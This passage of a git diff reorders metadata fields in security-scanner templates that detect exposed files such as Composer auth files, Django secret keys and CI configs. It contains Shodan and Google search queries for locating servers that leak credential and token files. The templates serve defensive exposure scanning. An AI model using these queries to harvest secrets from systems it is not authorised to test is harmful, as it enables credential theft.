\ No newline at end of file
diff --git a/http/exposures/configs/codeception-config.yaml b/http/exposures/configs/codeception-config.yaml
index 437ec7eb56..0217fc2326 100644
--- a/http/exposures/configs/codeception-config.yaml
+++ b/http/exposures/configs/codeception-config.yaml
@@ -5,6 +5,8 @@ info:
author: DhiyaneshDk
severity: low
description: Codeception YAML configuration file was detected.
+ classification:
+ cpe: cpe:2.3:a:codeception:codeception:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -13,8 +15,6 @@ info:
vendor: codeception
tags: exposure,devops,codeception,config,cicd
- classification:
- cpe: cpe:2.3:a:codeception:codeception:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/exposures/configs/filestash-admin-config.yaml b/http/exposures/configs/filestash-admin-config.yaml
index f38d22772f..7fb95518e6 100644
--- a/http/exposures/configs/filestash-admin-config.yaml
+++ b/http/exposures/configs/filestash-admin-config.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Filestash is susceptible to the Admin Password Configuration page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:filestash:filestash:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Admin Console "
- product: filestash
vendor: filestash
+ product: filestash
+ shodan-query: html:"Admin Console "
tags: exposure,filestash,config
- classification:
- cpe: cpe:2.3:a:filestash:filestash:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml
index 8674ae3575..3f3a1f2f28 100644
--- a/http/exposures/configs/jkstatus-manager.yaml
+++ b/http/exposures/configs/jkstatus-manager.yaml
@@ -8,16 +8,16 @@ info:
Exposed JKStatus manager which is a web-based tool that allows administrators to monitor and manage the connections between the Apache HTTP Server and the Tomcat application server.
reference:
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JKStatus.java
+ classification:
+ cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 8
- shodan-query: html:"JK Status Manager"
- product: tomcat
vendor: apache
+ product: tomcat
+ shodan-query: html:"JK Status Manager"
tags: config,jk,status,exposure
- classification:
- cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
http:
- method: GET
@@ -38,4 +38,5 @@ http:
- type: word
words:
- "JK Status Manager"
-# digest: 490a0046304402205bc0be4fe64354ab625e609d9b1de733811c19aee5c839064f3ee13fe5f1a9d702206e4a116fd9cd36ff0920b8589a6fdbb374ed0d8537cfeaf33faf2e63d21f1d3a:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205bc0be4fe64354ab625e609d9b1de733811c19aee5c839064f3ee13fe5f1a9d702206e4a116fd9cd36ff0920b8589a6fdbb374ed0d8537cfeaf33faf2e63d21f1d3a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/phpsys-info.yaml b/http/exposures/configs/phpsys-info.yaml
index 6df3d9fa7f..f6e58be5d1 100644
--- a/http/exposures/configs/phpsys-info.yaml
+++ b/http/exposures/configs/phpsys-info.yaml
@@ -7,16 +7,16 @@ info:
description: |
phpSysInfo: a customizable PHP script that displays information about your system nicely
reference: https://phpsysinfo.github.io/phpsysinfo/
+ classification:
+ cpe: cpe:2.3:a:phpsysinfo:phpsysinfo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"phpSysInfo"
- product: phpsysinfo
vendor: phpsysinfo
+ product: phpsysinfo
+ shodan-query: html:"phpSysInfo"
tags: config,exposure,phpsysinfo
- classification:
- cpe: cpe:2.3:a:phpsysinfo:phpsysinfo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022007eae5c482391a502e1165c940ad07ee2b0c4d9d00ef45dbb05bd2c905480dc7022100e054e5cf9b85bd1a6b75e9e2a959d8176c1a04831e8788c670bdc539ed361df5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022007eae5c482391a502e1165c940ad07ee2b0c4d9d00ef45dbb05bd2c905480dc7022100e054e5cf9b85bd1a6b75e9e2a959d8176c1a04831e8788c670bdc539ed361df5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/rakefile-disclosure.yaml b/http/exposures/configs/rakefile-disclosure.yaml
index c14f566d39..2907453286 100644
--- a/http/exposures/configs/rakefile-disclosure.yaml
+++ b/http/exposures/configs/rakefile-disclosure.yaml
@@ -8,16 +8,16 @@ info:
Rakefile configuration file was detected.
reference:
- https://ruby.github.io/rake/doc/rakefile_rdoc.html
+ classification:
+ cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Rakefile"
- product: ruby
vendor: ruby-lang
+ product: ruby
+ shodan-query: html:"Rakefile"
tags: devops,exposure,rakefile,config,ruby,rails
- classification:
- cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,4 @@ http:
- 'task :'
condition: and
-# digest: 490a00463044022006d1348a9ef873df72d1fb2c0826d6d4ab59cae528ffd3b606b12acb7cd446d402206735a2059c2232203e2902431481d570b764b24f0dac6abcabd0507111b0c262:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022006d1348a9ef873df72d1fb2c0826d6d4ab59cae528ffd3b606b12acb7cd446d402206735a2059c2232203e2902431481d570b764b24f0dac6abcabd0507111b0c262:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/yii-debugger.yaml b/http/exposures/configs/yii-debugger.yaml
index 11aadded66..7ae8e65aba 100644
--- a/http/exposures/configs/yii-debugger.yaml
+++ b/http/exposures/configs/yii-debugger.yaml
@@ -7,16 +7,16 @@ info:
description: Detects potential exposure to Yii Debugger information.
reference:
- https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
+ classification:
+ cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
- shodan-query: title:"Yii Debugger"
- product: yii
vendor: yii_software
+ product: yii
+ shodan-query: title:"Yii Debugger"
tags: yii,debug,exposure
- classification:
- cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -47,4 +47,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022045e18422d1a7a5c2fba88c671860be9cdaaa1d7f51b85ca7d992891fc347cdaf02210081e5c948bfe391b0bcdbe2f935dc2c387bce5f6b0691962f3782af0c72621d2b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022045e18422d1a7a5c2fba88c671860be9cdaaa1d7f51b85ca7d992891fc347cdaf02210081e5c948bfe391b0bcdbe2f935dc2c387bce5f6b0691962f3782af0c72621d2b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/angular-json.yaml b/http/exposures/files/angular-json.yaml
index c1c0bde95d..78bd526d9f 100644
--- a/http/exposures/files/angular-json.yaml
+++ b/http/exposures/files/angular-json.yaml
@@ -4,18 +4,18 @@ info:
name: Angular JSON File Exposure
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:angularjs:angular:*:*:*:*:node.js:*:*:*
metadata:
verified: true
max-request: 4
+ vendor: angularjs
+ product: angular
shodan-query:
- html:"angular.json"
- html:"angular-cli.json"
- product: angular
- vendor: angularjs
tags: exposure,angularjs,files
- classification:
- cpe: cpe:2.3:a:angularjs:angular:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
@@ -44,4 +44,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100a17e551eb0d7282c84cbe80752cfc5cd8bb2cc4bcd1f57210bd3bf8090ff884702203cbb81aa88602b99846e1c74c29e3bcb1ee3d64cf681d7d54f4fda618fc037b0:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100a17e551eb0d7282c84cbe80752cfc5cd8bb2cc4bcd1f57210bd3bf8090ff884702203cbb81aa88602b99846e1c74c29e3bcb1ee3d64cf681d7d54f4fda618fc037b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/azure-pipelines-exposed.yaml b/http/exposures/files/azure-pipelines-exposed.yaml
index 052398b7df..4f465c1095 100644
--- a/http/exposures/files/azure-pipelines-exposed.yaml
+++ b/http/exposures/files/azure-pipelines-exposed.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: medium
description: Azure Pipelines internal critical file is disclosed.
+ classification:
+ cpe: cpe:2.3:a:microsoft:azure_pipelines_agent:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"azure-pipelines.yml"
- product: azure_pipelines_agent
vendor: microsoft
+ product: azure_pipelines_agent
+ shodan-query: html:"azure-pipelines.yml"
tags: config,exposure,azure,microsoft,cloud,devops,files
- classification:
- cpe: cpe:2.3:a:microsoft:azure_pipelines_agent:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221008b94c0b7ae5c2ca9bfae48435c7a1c090bbabe98b212d1d938b9dc3cf1e163e3022100814b1fc7dcfd68cfebf207a80a54fcdcd53de52cf07bcf2b83b59141ae8b9257:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221008b94c0b7ae5c2ca9bfae48435c7a1c090bbabe98b212d1d938b9dc3cf1e163e3022100814b1fc7dcfd68cfebf207a80a54fcdcd53de52cf07bcf2b83b59141ae8b9257:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/bitbucket-pipelines.yaml b/http/exposures/files/bitbucket-pipelines.yaml
index 946e6068e4..7c5f1a41d4 100644
--- a/http/exposures/files/bitbucket-pipelines.yaml
+++ b/http/exposures/files/bitbucket-pipelines.yaml
@@ -4,16 +4,16 @@ info:
name: BitBucket Pipelines Configuration Exposure
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"bitbucket-pipelines.yml"
- product: bitbucket
vendor: atlassian
+ product: bitbucket
+ shodan-query: html:"bitbucket-pipelines.yml"
tags: exposure,bitbucket,devops,cicd,files
- classification:
- cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 490a00463044022007328c206da35551b76be9d31fef4244abbd54c4f29c466362271bcaa766791c02207ea142024f126767b6c73826034e5958f9fd4f83f9f330900ea5f3184b8b5a98:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022007328c206da35551b76be9d31fef4244abbd54c4f29c466362271bcaa766791c02207ea142024f126767b6c73826034e5958f9fd4f83f9f330900ea5f3184b8b5a98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/cargo-toml-file.yaml b/http/exposures/files/cargo-toml-file.yaml
index 103c988b68..71eff68d52 100644
--- a/http/exposures/files/cargo-toml-file.yaml
+++ b/http/exposures/files/cargo-toml-file.yaml
@@ -6,16 +6,16 @@ info:
severity: info
reference:
- https://doc.rust-lang.org/cargo/reference/manifest.html
+ classification:
+ cpe: cpe:2.3:a:rust-lang:cargo:*:*:*:*:rust:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Cargo.toml"
- product: cargo
vendor: rust-lang
+ product: cargo
+ shodan-query: html:"Cargo.toml"
tags: exposure,files,cargo
- classification:
- cpe: cpe:2.3:a:rust-lang:cargo:*:*:*:*:rust:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100b4763602761da36c759bf47cde4c3002141bd96b9b99caf036cceea4410780da022100f9f3d41f5cad48e3ba3d6ce0a66567a72b77d842a81e6c5bd4a84066d77c0c72:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b4763602761da36c759bf47cde4c3002141bd96b9b99caf036cceea4410780da022100f9f3d41f5cad48e3ba3d6ce0a66567a72b77d842a81e6c5bd4a84066d77c0c72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/cold-fusion-cfcache-map.yaml b/http/exposures/files/cold-fusion-cfcache-map.yaml
index 337c5602f2..cfdd915353 100644
--- a/http/exposures/files/cold-fusion-cfcache-map.yaml
+++ b/http/exposures/files/cold-fusion-cfcache-map.yaml
@@ -7,15 +7,15 @@ info:
description: Adobe Cold Fusion cfcache.map file is exposed.
reference:
- https://securiteam.com/windowsntfocus/5bp081f0ac/
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe ColdFusion"
- product: coldfusion
- vendor: adobe
- tags: exposure,coldfusion,adobe,files
-
classification:
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: adobe
+ product: coldfusion
+ shodan-query: http.component:"Adobe ColdFusion"
+ tags: exposure,coldfusion,adobe,files
+
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fef8683860fe862b93f70e5fdba2f718a98660cc60f6a2373959e4121f09e5df02210095aa459081ef46daa33a550d688d8e45729004b187326878bade325f2687a531:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100fef8683860fe862b93f70e5fdba2f718a98660cc60f6a2373959e4121f09e5df02210095aa459081ef46daa33a550d688d8e45729004b187326878bade325f2687a531:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/composer-auth-json.yaml b/http/exposures/files/composer-auth-json.yaml
index a59a4f62c5..fbc488f645 100644
--- a/http/exposures/files/composer-auth-json.yaml
+++ b/http/exposures/files/composer-auth-json.yaml
@@ -6,16 +6,16 @@ info:
severity: low
description: Composer Auth Josn file is disclosed.
reference: https://www.exploit-db.com/ghdb/5768
+ classification:
+ cpe: cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- google-query: intext:"index of /" ".composer-auth.json"
- product: composer
vendor: getcomposer
+ product: composer
+ google-query: intext:"index of /" ".composer-auth.json"
tags: exposure,devops,files
- classification:
- cpe: cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220528743ede15c139c840411b47991f9329314ad0aa8fd771f5c4350b142857c9402210088cbdfa074686c7fe9c609ac549b2da1d7f6db05062eb47607952d9e03f81c61:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220528743ede15c139c840411b47991f9329314ad0aa8fd771f5c4350b142857c9402210088cbdfa074686c7fe9c609ac549b2da1d7f6db05062eb47607952d9e03f81c61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/django-secret-key.yaml b/http/exposures/files/django-secret-key.yaml
index 78c0cb291b..3f8468d0c5 100644
--- a/http/exposures/files/django-secret-key.yaml
+++ b/http/exposures/files/django-secret-key.yaml
@@ -7,17 +7,17 @@ info:
description: |
The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file.
reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
+ classification:
+ cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 7
+ vendor: djangoproject
+ product: django
shodan-query: html:settings.py
comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.'
- product: django
- vendor: djangoproject
tags: django,exposure,files
- classification:
- cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -63,4 +63,4 @@ http:
regex:
- "os.environ.setdefault\\([\"']DJANGO_SETTINGS_MODULE[\"'],\\s[\"']([a-zA-Z-_0-9]*).settings[\"']\\)"
-# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/environment-rb.yaml b/http/exposures/files/environment-rb.yaml
index c8cc6f13a8..641aec94fe 100644
--- a/http/exposures/files/environment-rb.yaml
+++ b/http/exposures/files/environment-rb.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: medium
description: Ruby environment file is exposed.
+ classification:
+ cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- google-query: intitle:"index of" "environment.rb"
- product: ruby
vendor: ruby-lang
+ product: ruby
+ google-query: intitle:"index of" "environment.rb"
tags: ruby,devops,exposure,files
- classification:
- cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502207cc2acc21d477a6069fc922566e9791eca9bea02ae2dc0519287252901cb4300022100f6f07d90bb3fee86cb451f6c9839a25af3fa7d9c6881e3a3aa76c5d813159326:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502207cc2acc21d477a6069fc922566e9791eca9bea02ae2dc0519287252901cb4300022100f6f07d90bb3fee86cb451f6c9839a25af3fa7d9c6881e3a3aa76c5d813159326:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/get-access-token-json.yaml b/http/exposures/files/get-access-token-json.yaml
index e0d7cbc97c..f08dfafe3a 100644
--- a/http/exposures/files/get-access-token-json.yaml
+++ b/http/exposures/files/get-access-token-json.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: low
description: Internal file is exposed in Constant Contact Forms wordpress plugin.
+ classification:
+ cpe: cpe:2.3:a:constantcontact:constant_contact_forms:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 2
- google-query: intitle:"index of" "get_access_token.json"
- product: constant_contact_forms
vendor: constantcontact
+ product: constant_contact_forms
+ google-query: intitle:"index of" "get_access_token.json"
tags: exposure,files
- classification:
- cpe: cpe:2.3:a:constantcontact:constant_contact_forms:*:*:*:*:wordpress:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201a17410508b8cd9c18863c5613d75419a2e7ee76930a8c4b348656e1b6077e99022100f9cb5a0e7bed2b0d8558d63a0cc54c73ee5bed256286a01ab670dec759389bae:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502201a17410508b8cd9c18863c5613d75419a2e7ee76930a8c4b348656e1b6077e99022100f9cb5a0e7bed2b0d8558d63a0cc54c73ee5bed256286a01ab670dec759389bae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/git-mailmap.yaml b/http/exposures/files/git-mailmap.yaml
index 8f6ef18d32..1fbe1792ea 100644
--- a/http/exposures/files/git-mailmap.yaml
+++ b/http/exposures/files/git-mailmap.yaml
@@ -6,16 +6,16 @@ info:
severity: low
description: Git Mailmap file is exposed.
reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html
+ classification:
+ cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:mailmap
- product: git
vendor: git-scm
+ product: git
+ shodan-query: html:mailmap
tags: config,exposure,git,mailmap,files
- classification:
- cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100aea6f55c151da3533a23fff3ea34789c86f4e8634e81e427401c5159d18a3e7102207ec7da22ef8807432cfed1241fe2527f7104a0fdb90d7087a93a0a33fe364798:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100aea6f55c151da3533a23fff3ea34789c86f4e8634e81e427401c5159d18a3e7102207ec7da22ef8807432cfed1241fe2527f7104a0fdb90d7087a93a0a33fe364798:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/gitlab-ci-yml.yaml b/http/exposures/files/gitlab-ci-yml.yaml
index 637c492688..06204c644e 100644
--- a/http/exposures/files/gitlab-ci-yml.yaml
+++ b/http/exposures/files/gitlab-ci-yml.yaml
@@ -10,16 +10,16 @@ info:
Unauthorized access to this file can lead to severe security risks and operational disruptions.
reference:
- https://x.com/RootMoksha/status/1816571625388818923/photo/1
+ classification:
+ cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"gitlab-ci.yml"
- product: gitlab
vendor: gitlab
+ product: gitlab
+ shodan-query: html:"gitlab-ci.yml"
tags: exposure,config,cicd,gitlab
- classification:
- cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -53,4 +53,5 @@ http:
- "releasePath:"
- "sshUser:"
condition: and
-# digest: 4a0a00473045022007a39762d89b6a8d4ed1692fa3b994f80447b9ae07e9d86415c3a8ae50101fd2022100a58332134fdfa5d4f624aa7017194ef05c2c25a656f10e5e1b3560491421e724:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022007a39762d89b6a8d4ed1692fa3b994f80447b9ae07e9d86415c3a8ae50101fd2022100a58332134fdfa5d4f624aa7017194ef05c2c25a656f10e5e1b3560491421e724:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/go-mod-disclosure.yaml b/http/exposures/files/go-mod-disclosure.yaml
index cabcd8916d..2967019a20 100644
--- a/http/exposures/files/go-mod-disclosure.yaml
+++ b/http/exposures/files/go-mod-disclosure.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: go.mod internal file is exposed.
+ classification:
+ cpe: cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"go.mod"
- product: go
vendor: golang
+ product: go
+ shodan-query: html:"go.mod"
tags: exposure,files,go
- classification:
- cpe: cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ce65da202aa15b908bb7eea37f489e908dd5d6d1ab1b80ebcf465254da1afbc302205bca379efacba2a0b37e7e20f6745cf49977a8f23e0b51081b231defa8346862:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ce65da202aa15b908bb7eea37f489e908dd5d6d1ab1b80ebcf465254da1afbc302205bca379efacba2a0b37e7e20f6745cf49977a8f23e0b51081b231defa8346862:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/gradle-libs.yaml b/http/exposures/files/gradle-libs.yaml
index 90a67934e2..565a4813ad 100644
--- a/http/exposures/files/gradle-libs.yaml
+++ b/http/exposures/files/gradle-libs.yaml
@@ -4,16 +4,16 @@ info:
name: Gradle Library Version Disclosure
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:gradle:gradle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- github-query: filename:libs.versions.toml
- product: gradle
vendor: gradle
+ product: gradle
+ github-query: filename:libs.versions.toml
tags: file,gradle,exposure
- classification:
- cpe: cpe:2.3:a:gradle:gradle:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 200
-# digest: 4b0a0048304602210080edd28e23b35c989037deb44531294eb9982daa89844ac847928bc471217ba5022100f9dde0727dc6c3bce417ab75bb24ee2564634eba671def40049a6364b134a36a:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210080edd28e23b35c989037deb44531294eb9982daa89844ac847928bc471217ba5022100f9dde0727dc6c3bce417ab75bb24ee2564634eba671def40049a6364b134a36a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/npm-cli-metrics-json.yaml b/http/exposures/files/npm-cli-metrics-json.yaml
index 69974ff672..e5d6577b96 100644
--- a/http/exposures/files/npm-cli-metrics-json.yaml
+++ b/http/exposures/files/npm-cli-metrics-json.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: low
description: anonymous-cli-metrics.json internal file in NPM is exposed.
+ classification:
+ cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"anonymous-cli-metrics.json"
- product: npm
vendor: npmjs
+ product: npm
+ shodan-query: html:"anonymous-cli-metrics.json"
tags: npm,devops,exposure,files
- classification:
- cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100eaf7f16886772d6881b4d42ae77c8b6616b04a7e28180a7bed7e15c3337ede25022100ab13085332c05794eef6e9bbdb40f9535a23bccd1649782c36159e906d7abac3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100eaf7f16886772d6881b4d42ae77c8b6616b04a7e28180a7bed7e15c3337ede25022100ab13085332c05794eef6e9bbdb40f9535a23bccd1649782c36159e906d7abac3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/npm-shrinkwrap-exposure.yaml b/http/exposures/files/npm-shrinkwrap-exposure.yaml
index e838f6cc84..da6337e994 100644
--- a/http/exposures/files/npm-shrinkwrap-exposure.yaml
+++ b/http/exposures/files/npm-shrinkwrap-exposure.yaml
@@ -8,16 +8,16 @@ info:
A file created by npm shrinkwrap. It is identical to package-lock.json.
reference:
- https://docs.npmjs.com/cli/v9/configuring-npm/npm-shrinkwrap-json
+ classification:
+ cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"npm-shrinkwrap.json"
- product: npm
vendor: npmjs
+ product: npm
+ shodan-query: html:"npm-shrinkwrap.json"
tags: config,exposure,npm,files,node
- classification:
- cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100be8c7af965335ed157714bfa31dda10b0e5eb81c3b5c1aeb37f88a2aacb47884022100a91344fb45fa4d8e9fee2b6eb3d317b4e92afed22d813fac680609f7f71bc8a1:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100be8c7af965335ed157714bfa31dda10b0e5eb81c3b5c1aeb37f88a2aacb47884022100a91344fb45fa4d8e9fee2b6eb3d317b4e92afed22d813fac680609f7f71bc8a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/nuget-package-config.yaml b/http/exposures/files/nuget-package-config.yaml
index db1c16d613..bfc4ca70a9 100644
--- a/http/exposures/files/nuget-package-config.yaml
+++ b/http/exposures/files/nuget-package-config.yaml
@@ -7,16 +7,16 @@ info:
reference:
- https://learn.microsoft.com/en-us/nuget/reference/packages-config
- https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt
+ classification:
+ cpe: cpe:2.3:a:microsoft:nuget:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"packages.config"
- product: nuget
vendor: microsoft
+ product: nuget
+ shodan-query: html:"packages.config"
tags: exposure,sass,devops,cicd,nuget,files
- classification:
- cpe: cpe:2.3:a:microsoft:nuget:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502202e84589746805c8bbca0cf94b1bffa171136ccc8b6ad5616fa29d2951f1284d3022100dbd8a24d22bbd58ed9e38a8775142f1982ed9b338529bac0a05e6872e95f2d65:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202e84589746805c8bbca0cf94b1bffa171136ccc8b6ad5616fa29d2951f1284d3022100dbd8a24d22bbd58ed9e38a8775142f1982ed9b338529bac0a05e6872e95f2d65:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/files/oracle-test-cgi.yaml b/http/exposures/files/oracle-test-cgi.yaml
index b34665e71f..580c87ec96 100644
--- a/http/exposures/files/oracle-test-cgi.yaml
+++ b/http/exposures/files/oracle-test-cgi.yaml
@@ -4,16 +4,16 @@ info:
name: Oracle Application Server test-cgi Page
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:oracle:http_server:*:*:*:*:*:*:*:*
